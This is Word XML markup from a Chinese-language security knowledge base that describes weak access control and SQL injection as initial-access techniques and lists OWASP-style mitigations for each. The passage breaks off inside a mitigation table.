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041F32" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00BA6351">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc520300698"/>
      <w:bookmarkStart w:id="1" w:name="_Ref532218408"/>
      <w:bookmarkStart w:id="2" w:name="_Ref532218410"/>
      <w:bookmarkStart w:id="3" w:name="_Ref518917953"/>
      <w:bookmarkStart w:id="4" w:name="_Ref518917958"/>
      <w:bookmarkStart w:id="5" w:name="_Toc519696111"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>初始访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23272760" w14:textId="77777777" w:rsidR="00624164" w:rsidRDefault="00624164" w:rsidP="00624164">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C164D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>弱访问控制漏洞</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00624164" w14:paraId="7BE96E51" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="301E519D" w14:textId="77777777" w:rsidR="00624164" w:rsidRDefault="00624164" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>H</w:t>
            </w:r>
            <w:r>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>01</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11EE9C52" w14:textId="491DF44F" w:rsidR="0038146A" w:rsidRPr="00671A0D" w:rsidRDefault="0038146A" w:rsidP="0038146A">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术：初始访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="162DAF4E" w14:textId="77777777" w:rsidR="00624164" w:rsidRDefault="00624164" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Linux</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>macOS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71AB10CF" w14:textId="77777777" w:rsidR="00624164" w:rsidRDefault="00624164" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需权限</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AB0CE5C" w14:textId="77777777" w:rsidR="00624164" w:rsidRDefault="00624164" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据源</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>NTA</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>web</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中间件</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WAF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用日志</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="453A23E5" w14:textId="77777777" w:rsidR="00624164" w:rsidRDefault="00624164" w:rsidP="00624164"/>
    <w:p w14:paraId="627FD571" w14:textId="77777777" w:rsidR="00624164" w:rsidRDefault="00624164" w:rsidP="00624164">
      <w:r w:rsidRPr="009C164D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问控制强制执行策略，以便用户无法在其预期权限之外执行操作。故障通常导致未经授权的信息泄露，修改或破坏所有数据，或执行超出用户限制的业务功能。常见的访问控制漏洞包括</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C344E" w14:textId="77777777" w:rsidR="00624164" w:rsidRDefault="00624164" w:rsidP="00624164">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
      </w:pPr>
      <w:r w:rsidRPr="009C164D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过修改</w:t>
      </w:r>
      <w:r w:rsidRPr="009C164D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="009C164D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，内部应用程序状态或</w:t>
      </w:r>
      <w:r w:rsidRPr="009C164D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="009C164D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面或仅使用自定义</w:t>
      </w:r>
      <w:r w:rsidRPr="009C164D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="009C164D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击工具绕过访问控制检查。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DF6F87" w14:textId="77777777" w:rsidR="00624164" w:rsidRDefault="00624164" w:rsidP="00624164">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
      </w:pPr>
      <w:r w:rsidRPr="009C164D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许将主键更改为其他用户记录，允许查看或编辑他人的帐户。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC643B1" w14:textId="77777777" w:rsidR="00624164" w:rsidRDefault="00624164" w:rsidP="00624164">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
      </w:pPr>
      <w:r w:rsidRPr="009C164D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>特权提升。以用户身份登录时无需登录或充当管理员的用户。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1FB93D" w14:textId="77777777" w:rsidR="00624164" w:rsidRDefault="00624164" w:rsidP="00624164">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
      </w:pPr>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>元数据操作，例如重放或篡改</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JSON Web</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>令牌（</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JWT</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）访问控制令牌或</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或隐藏字段被操纵以提升权限或滥用</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JWT</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>失效</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E122E22" w14:textId="77777777" w:rsidR="00624164" w:rsidRDefault="00624164" w:rsidP="00624164">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
      </w:pPr>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CORS</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置错误允许未经授权的</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A808114" w14:textId="77777777" w:rsidR="00624164" w:rsidRDefault="00624164" w:rsidP="00624164">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
      </w:pPr>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>强制浏览经过身份验证的页面作为未经身份验证的用户或强制页面作为标准用户。访问具有</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PUT</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DELETE</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缺少访问控制的</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE4B4FA" w14:textId="77777777" w:rsidR="00624164" w:rsidRDefault="00624164" w:rsidP="00624164">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FFDD6B" w14:textId="77777777" w:rsidR="00624164" w:rsidRDefault="00624164" w:rsidP="00624164">
      <w:r w:rsidRPr="006F61C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>问控制仅在受信任的服务器端代码或无服务器</w:t>
      </w:r>
      <w:r w:rsidRPr="006F61C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="006F61C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中强制执行时才有效，攻击者无法修改访问控制检查或元数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DE42CA" w14:textId="77777777" w:rsidR="00624164" w:rsidRDefault="00624164" w:rsidP="00624164">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
      </w:pPr>
      <w:r w:rsidRPr="006F61C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>除公共资源外，拒绝默认。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B50EF5" w14:textId="77777777" w:rsidR="00624164" w:rsidRDefault="00624164" w:rsidP="00624164">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
      </w:pPr>
      <w:r w:rsidRPr="006F61C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实施一次访问控制机制，并在整个应用程序中重复使用它们，包括最大限度地减少</w:t>
      </w:r>
      <w:r w:rsidRPr="006F61C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CORS</w:t>
      </w:r>
      <w:r w:rsidRPr="006F61C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120BA31A" w14:textId="77777777" w:rsidR="00624164" w:rsidRDefault="00624164" w:rsidP="00624164">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
      </w:pPr>
      <w:r w:rsidRPr="006F61C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>模型访问控制应强制执行记录所有权，而不是接受用户可以创建，读取，更新或删除任何记录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637CC49B" w14:textId="77777777" w:rsidR="00624164" w:rsidRDefault="00624164" w:rsidP="00624164">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
      </w:pPr>
      <w:r w:rsidRPr="006F61C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>域模型应强制执行特殊的应用程序业务限制要求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448F55EF" w14:textId="77777777" w:rsidR="00624164" w:rsidRDefault="00624164" w:rsidP="00624164">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
      </w:pPr>
      <w:r w:rsidRPr="006F61C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>禁用</w:t>
      </w:r>
      <w:r w:rsidRPr="006F61C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="006F61C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器目录列表并确保文件元数据（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="006F61C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.git</w:t>
      </w:r>
      <w:r w:rsidRPr="006F61C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）并且备份文件不存在于</w:t>
      </w:r>
      <w:r w:rsidRPr="006F61C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="006F61C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根目录中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E093AE" w14:textId="77777777" w:rsidR="00624164" w:rsidRDefault="00624164" w:rsidP="00624164">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
      </w:pPr>
      <w:r w:rsidRPr="006F61C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>记录访问控制失败，在适当时警告管理员（例如重复失败）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478E5C97" w14:textId="77777777" w:rsidR="00624164" w:rsidRDefault="00624164" w:rsidP="00624164">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
      </w:pPr>
      <w:r w:rsidRPr="006F61C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>速率限制</w:t>
      </w:r>
      <w:r w:rsidRPr="006F61C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="006F61C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和控制器访问以最小化伤害来自自动攻击工具。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B82F9A7" w14:textId="77777777" w:rsidR="00624164" w:rsidRPr="009C164D" w:rsidRDefault="00624164" w:rsidP="00624164">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
      </w:pPr>
      <w:r w:rsidRPr="006F61C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注销后，</w:t>
      </w:r>
      <w:r w:rsidRPr="006F61C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JWT</w:t>
      </w:r>
      <w:r w:rsidRPr="006F61C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>令牌应在服务器上失效。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23025F21" w14:textId="622621A7" w:rsidR="00624164" w:rsidRDefault="00624164" w:rsidP="00624164">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00624164">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00624164">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00624164" w14:paraId="76A4761C" w14:textId="77777777" w:rsidTr="00624164">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="544F7B54" w14:textId="37E4DA3E" w:rsidR="00624164" w:rsidRDefault="00624164" w:rsidP="00624164">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>H</w:t>
            </w:r>
            <w:r>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D5555A7" w14:textId="77777777" w:rsidR="0038146A" w:rsidRPr="00671A0D" w:rsidRDefault="0038146A" w:rsidP="0038146A">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术：初始访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="083B1DC9" w14:textId="77777777" w:rsidR="00624164" w:rsidRDefault="00624164" w:rsidP="00624164">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Linux</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>macOS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EF25A72" w14:textId="77777777" w:rsidR="00624164" w:rsidRDefault="00624164" w:rsidP="00624164">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需权限</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49810B89" w14:textId="1284AA9F" w:rsidR="00624164" w:rsidRDefault="00624164" w:rsidP="00624164">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据源</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>NTA</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>web</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中间件</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WAF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用日志</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4EF0D0E5" w14:textId="77777777" w:rsidR="00624164" w:rsidRDefault="00624164" w:rsidP="00624164">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F783B08" w14:textId="33C49744" w:rsidR="00624164" w:rsidRDefault="00624164" w:rsidP="00624164">
      <w:r w:rsidRPr="00624164">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00624164">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入是一种代码注入技术，用于攻击数据驱动的应用程序，其中将恶意</w:t>
      </w:r>
      <w:r w:rsidRPr="00624164">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00624164">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句插入到输入字段中以便执行（例如，将数据库内容转储给攻击者）。</w:t>
      </w:r>
      <w:r w:rsidRPr="00624164">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00624164">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入必须利用应用程序软件中的安全漏洞，例如，当用户输入被错误地过滤为嵌入在</w:t>
      </w:r>
      <w:r w:rsidRPr="00624164">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00624164">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句中的字符串文字转义字符或用户输入没有强类型和意外执行时。</w:t>
      </w:r>
      <w:r w:rsidRPr="00624164">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00624164">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入通常被称为网站的攻击媒介，但可用于攻击任何类型的</w:t>
      </w:r>
      <w:r w:rsidRPr="00624164">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00624164">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EBD968" w14:textId="181A79AE" w:rsidR="00624164" w:rsidRDefault="00624164" w:rsidP="006003E3">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2547"/>
        <w:gridCol w:w="7189"/>
      </w:tblGrid>
      <w:tr w:rsidR="00624164" w:rsidRPr="005C4554" w14:paraId="0E0759D8" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
